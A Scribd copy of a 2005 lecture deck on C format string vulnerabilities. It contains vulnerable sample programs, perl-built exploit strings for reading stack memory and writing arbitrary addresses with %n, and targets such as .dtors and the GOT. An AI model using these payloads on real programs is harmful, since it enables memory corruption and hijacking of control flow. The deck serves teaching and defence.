Scribd
Upload
86 views

Format String Vulnerability

This document discusses format string vulnerabilities. It explains that functions like printf and sprintf are vulnerable if they allow user-supplied format strings. An attacker can use special formatting codes to read or write arbitrary memory addresses. It provides examples of how an attacker could read the contents of a buffer by traversing memory addresses. It also demonstrates how the %n format code allows writing a number of bytes to a specified memory address, such as overwriting a return address or global offset table. Multiple writes may be needed to overwrite multi-byte values.

Uploaded by

ArunSharma
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
86 views

Format String Vulnerability

This document discusses format string vulnerabilities. It explains that functions like printf and sprintf are vulnerable if they allow user-supplied format strings. An attacker can use special formatting codes to read or write arbitrary memory addresses. It provides examples of how an attacker could read the contents of a buffer by traversing memory addresses. It also demonstrates how the %n format code allows writing a number of bytes to a specified memory address, such as overwriting a return address or global offset table. Multiple writes may be needed to overwrite multi-byte values.

Uploaded by

ArunSharma
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 28

Format String Vulnerability

I & II
[email protected]
2005/10/15

Format String function family

fprintf
printf
sprintf
snprintf
vfprintf
vprintf
vsprintf
vsnprintf
2

The usage of printf()


Normal
char buf[] = Hello World;
printf(%s, buf);

Dangerous
char buf[] = Hello World;
printf(buf);

The key point is that use format


string function without strict type
check
3

Why is Dangerous
Example 1
printf(argv[1]);

Example 2
int show_error(char *str)
{

printf(str);

}
What will happen if we insert a %s to argv[1] or str
Print the stack content as a string
4

Why is DangerousCont.
Sample Code
#include <stdio.h>
int main(int argc, char *argv[])
{
if (argc > 1)
printf(argv[1]);
putchar('\n');
return 0;

}
Execute
$ ./a.out `perl -e 'print "AAAAAAAA"."%08x."x200'`
5

Why is DangerousCont.
AAAAAAAAbfbfef90.000000f3.2804e06f.0804835b.068acf04.66667542.75427265.7265
6666.00000000.00000000.00000000.00000000.00000000.00000000.00000000.00000
000.00000000.00000000.00000000.00000000.00000000.00000000.00000000.000000
00.00000000.00000000.00000000.00000000.00000000.00000000.00000000.0000000
0.00000000.00000000.00000000.00000000.00000000.00000000.00000000.00000000
.00000000.00000000.00000000.00000000.00000000.00000000.00000000.00000000.
00000000.00000000.00000000.00000000.00000000.00000000.00000000.00000000.0
0000000.00000000.00000000.00000000.00000000.00000000.00000000.00000000.00
000000.00000000.00000000.00000000.00000000.bfbff0e4.080484cd.00000002.bfbff0
ec.bfbff0f8.bfbff207.bfbff207.00000297.bfbff0e4.080483e2.080484b3.08048688.00000
000.00000000.00000000.bfbff0e0.00000000.00000000.bfbff0e0.bfbff0e4.bfbff0ec.000
00000.00000002.bfbff200.bfbff208.00000000.bfbff5f9.bfbff60f.bfbff61b.bfbffa02.bfbffa
0b.bfbffa1a.bfbffa24.bfbffa31.bfbffa47.bfbffa5b.bfbffad2.bfbffadf.bfbffaf4.bfbffb14.bfbff
b46.bfbffb59.bfbffb6a.bfbffb77.bfbffb86.bfbffb94.bfbffb9c.bfbffbc4.bfbffbd0.bfbffbdd.bf
bffbf8.bfbffc1b.bfbffc3b.bfbffdfb.bfbffe15.bfbffe23.bfbffe39.bfbffe47.bfbffe5f.bfbffe79.b
fbffea0.00000000.00000003.08048034.00000004.00000020.00000005.00000006.000
00006.00001000.00000008.00000000.00000009.08048444.00000007.28049000.0000
0000.00000000.00000000.00000000.00000000.00000000.00000000.00000000.00000
000.00000000.00000000.00000000.00000000.00000000.00000000.00000000.2e612f2
e.0074756f.41414141.41414141.78383025.3830252e.30252e78.252e7838.2e783830.
78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.2
52e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.38
30252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e78
3830.78383025.3830252e.30252e78.252e7838.2e783830.

Why is DangerousCont.
How about insert a memory address
instead of AAAAAAAA
For exaple, use \x61\xfa\xbf\xbf
41414141 -> bfbffa61

So we can read and even write


arbitrary memory address

What could we do for a format


string vulnerability
Read from arbitrary memory address
%s format
environment variable

Write to arbitrary memory address

%n format
return address
dtor
Global offset table
8

Read from arbitrary memory


address

Sample code

#include <stdio.h>

int main(int argc, char *argv[])


{
char buf[256] = Hello World";
printf("Buffer on %p\n", buf);
if (argc > 1)
printf(argv[1]);

putchar('\n');
return 0;

Get buf address

$ ./a.out
Buffer on 0xbfbff390

Read from arbitrary memory


addressCont.
Traverse to buf address

$ ./a.out `perl -e 'print "\x90\xf3\xbf\xbf"."%08x."x163'`

0000000.00000000.00000000.00000000.00000000.00000000.00000000.000000
00.00000000.00000000.00000000.00000000.00000000.00000000.00000000.00
000000.00000000.00000000.00000000.00000000.00000000.00000000.0000000
0.00000000.00000000.00000000.00000000.00000000.00000000.00000000.000
00000.00000000.00000000.00000000.00000000.00000000.00000000.00000000
.00000000.00000000.00000000.bfbff1a0.080484cd.00000002.bfbff1a8.bfbff1b4.
bfbff2c3.00000283.bfbff1a0.080483e2.080484b3.08048688.00000000.00000000
.00000000.bfbff19c.00000000.00000000.bfbff19c.bfbff1a0.bfbff1a8.00000000.0
0000002.bfbff2bc.bfbff2c4.00000000.bfbff5f8.bfbff60e.bfbff61a.bfbffa01.bfbffa0a
.bfbffa19.bfbffa23.bfbffa30.bfbffa46.bfbffa5a.bfbffad1.bfbffade.bfbffaf3.bfbffb13.
bfbffb45.bfbffb58.bfbffb69.bfbffb76.bfbffb85.bfbffb93.bfbffb9b.bfbffbc3.bfbffbcf.b
fbffbdc.bfbffbf7.bfbffc1a.bfbffc3a.bfbffdfa.bfbffe14.bfbffe22.bfbffe38.bfbffe46.bfbf
fe5e.bfbffe78.bfbffe9f.00000000.00000003.08048034.00000004.00000020.0000
0005.00000006.00000006.00001000.00000008.00000000.00000009.08048444.
00000007.28049000.00000000.00000000.00000000.00000000.00000000.00000
000.00000000.00000000.00000000.00000000.00000000.00000000.00000000.0
0000000.00000000.00000000.2e612f2e.0074756f.bfbff390.

10

Read from arbitrary memory


addressCont.

Read buf content

$ ./a.out `perl -e 'print "\x90\xf3\xbf\xbf"."%08x."x162'`%.1024s

0000000.00000000.00000000.00000000.00000000.00000000.00000000.000000
00.00000000.00000000.00000000.00000000.00000000.00000000.00000000.00
000000.00000000.00000000.00000000.00000000.00000000.00000000.0000000
0.00000000.00000000.00000000.00000000.00000000.00000000.00000000.000
00000.00000000.00000000.00000000.00000000.00000000.00000000.00000000
.00000000.00000000.00000000.bfbff1a0.080484cd.00000002.bfbff1a8.bfbff1b4.
bfbff2c3.00000283.bfbff1a0.080483e2.080484b3.08048688.00000000.00000000
.00000000.bfbff19c.00000000.00000000.bfbff19c.bfbff1a0.bfbff1a8.00000000.0
0000002.bfbff2bc.bfbff2c4.00000000.bfbff5f8.bfbff60e.bfbff61a.bfbffa01.bfbffa0a
.bfbffa19.bfbffa23.bfbffa30.bfbffa46.bfbffa5a.bfbffad1.bfbffade.bfbffaf3.bfbffb13.
bfbffb45.bfbffb58.bfbffb69.bfbffb76.bfbffb85.bfbffb93.bfbffb9b.bfbffbc3.bfbffbcf.b
fbffbdc.bfbffbf7.bfbffc1a.bfbffc3a.bfbffdfa.bfbffe14.bfbffe22.bfbffe38.bfbffe46.bfbf
fe5e.bfbffe78.bfbffe9f.00000000.00000003.08048034.00000004.00000020.0000
0005.00000006.00000006.00001000.00000008.00000000.00000009.08048444.
00000007.28049000.00000000.00000000.00000000.00000000.00000000.00000
000.00000000.00000000.00000000.00000000.00000000.00000000.00000000.0
0000000.00000000.00000000.2e612f2e.0074756f.Hello World

11

Write to arbitrary memory address


%n
Write the number of bytes written so far
to variable

12

Write to arbitrary memory address


Cont.

Demo Program

#include <stdio.h>

int main(int argc, char *argv[])


{
int value = 0;

printf("1st 0: %d\n", value);


printf("AAAA%n\t", &value);
printf("2nd: %d\n", value);
printf("AAAAAA%n\t", &value);
printf("3rd: %d\n", value);
return 0;

Result

1st 0: 0
AAAA 2nd: 4
AAAAAA 3rd: 6
13

Write to arbitrary memory address


Cont.

Sample Code

#include <stdio.h>

int main(int argc, char *argv[])


{
int value = 0;
printf("value @ %p\n", &value);
printf("before write value = %d\n", value);
if (argc > 1)
printf(argv[1]);

putchar('\n');
printf("after write value = %d\n", value);
return 0;

14

Write to arbitrary memory address


Cont.

Command

./a.out `perl -e 'print "\x6c\xf2\xbf\xbf"."%08x."x102'`%n

Result
value @ 0xbfbff26c
before write value = 0
?0000000.2804bc1b.00000002.bfbff2d4.08049690.bfbff2c8.2807caf6.00000002.00000000.b
fbff2c0.08048499.00000002.bfbff2c8.bfbff2d4.bfbff3e3.00000287.bfbff2c0.080483be.0804847
f.0804863c.00000000.00000000.00000000.bfbff2bc.00000000.00000000.bfbff2bc.bfbff2c0.bf
bff2c8.00000000.00000002.bfbff3dc.bfbff3e4.00000000.bfbff5e9.bfbff5ff.bfbff60b.bfbff9f2.bfb
ff9fb.bfbffa0a.bfbffa14.bfbffa21.bfbffa37.bfbffa4b.bfbffac2.bfbffacf.bfbffae4.bfbffb04.bfbffb36.
bfbffb49.bfbffb5a.bfbffb67.bfbffb76.bfbffb84.bfbffb8c.bfbffbc5.bfbffbd1.bfbffbde.bfbffbf9.bfbffc
1c.bfbffc3c.bfbffdfc.bfbffe16.bfbffe24.bfbffe3a.bfbffe48.bfbffe60.bfbffe7a.bfbffea1.00000000.0
0000003.08048034.00000004.00000020.00000005.00000006.00000006.00001000.00000008
.00000000.00000009.08048410.00000007.28049000.00000000.00000000.00000000.000000
00.00000000.00000000.00000000.00000000.00000000.00000000.00000000.00000000.0000
0000.00000000.00000000.00000000.2e612f2e.0074756f.

after write value = 922

15

Write to arbitrary memory address


Cont.
Use length format to control the written value
./a.out `perl -e 'print
"\x6c\xf2\xbf\xbf"."%08x."x101'`%8x%n
after write value = 921
./a.out `perl -e 'print
"\x6c\xf2\xbf\xbf"."%08x."x101'`%9x%n
after write value = 922
./a.out `perl -e 'print
"\x6c\xf2\xbf\xbf"."%08x."x101'`%109x%n
after write value = 1021
16

Multiple Writes
4-stage writes
Because the length format is not big
enough.
Write 4 times for 4 bytes
1st Write
2nd Write
3rd Write
4th Write
Result

12 00 00 00
34 00 00 00
56 00 00 00

0xbfbff26c
0xbfbff26d
0xbfbff26e

78 00 00 00 0xbfbff26f
12 34 56 78
17

Multiple Writes Cont.


./a.out `perl -e 'print
"\x6c\xf2\xbf\xbfAAAA\x6d\xf2\xbf\xbf
AAAA\x6e\xf2\xbf\xbfAAAA\x6f\xf2\xbf
\xbf"."%08x."x101'`%30x%n%45x%n
%57x%n%89x%n
Creative Calculation
Auto-calculate tool !?

18

Direct Parameter Access


%n$s
%1$d
printf(%6$d\n, 6, 5, 4, 3 ,2 ,1);
Print out 1

No Junk strings
./a.out `perl -e 'print
"\x6c\xf2\xbf\xbf\x6d\xf2\xbf\xbf\x6e\xf2\xb
f\xbf\x6f\xf2\xbf\xbf"`%5\$30x%6\$n%5\$4
5x%6\$n%5\$57x%6\$n%5\$89x%6\$n
19

Where to overwrite
Simple & Important Value
Unix-Like
Environment Variable
.dtors
GOT

Windows
SEH (Structures Exception Handler)

20

Where to overwrite Cont.


.dtors
Destructor
Writable
Nm
__DTOR_LIST__
__DTOR_END_

Objdump s j .dtors
Begin ffffffff
End 00000000
21

Where to overwrite Cont.


GOT
Share library reference PLT (Procedure
Linkage Table) address
PLT save address pointer
To GOT
GOT is writable

Objdump d j .got
Objdump R

22

Detection
Easy to detect
gcc Wformat

Many tool in the world

23

Automated tool
fmtbuilder
Usage : ./fmtbuilder [-nh] -a
<locaddr> -v <retaddr> -o <offset>
./a.out `./fmtbuilder -r 0x04030201 -a
0xbffff8f8 -b 0 -o 2 -n`

http://packetstormsecurity.org/paper
s/unix/fmtbuild.htm

24

Buffer Overflow V.S. Format


Strings
Specific Address
Detection

25

OS difference
Windows
Low address

Unix-Like
High address

Sparc
%hn

26

Reference
Hacking The Art of Exploitation
By Jon Erickson

Buffer Overflow Attacks


Detect,Exploit,Prevent
By Foster

http://packetstormsecurity.org/

27

The End

Thank you and your suggestions

28

You might also like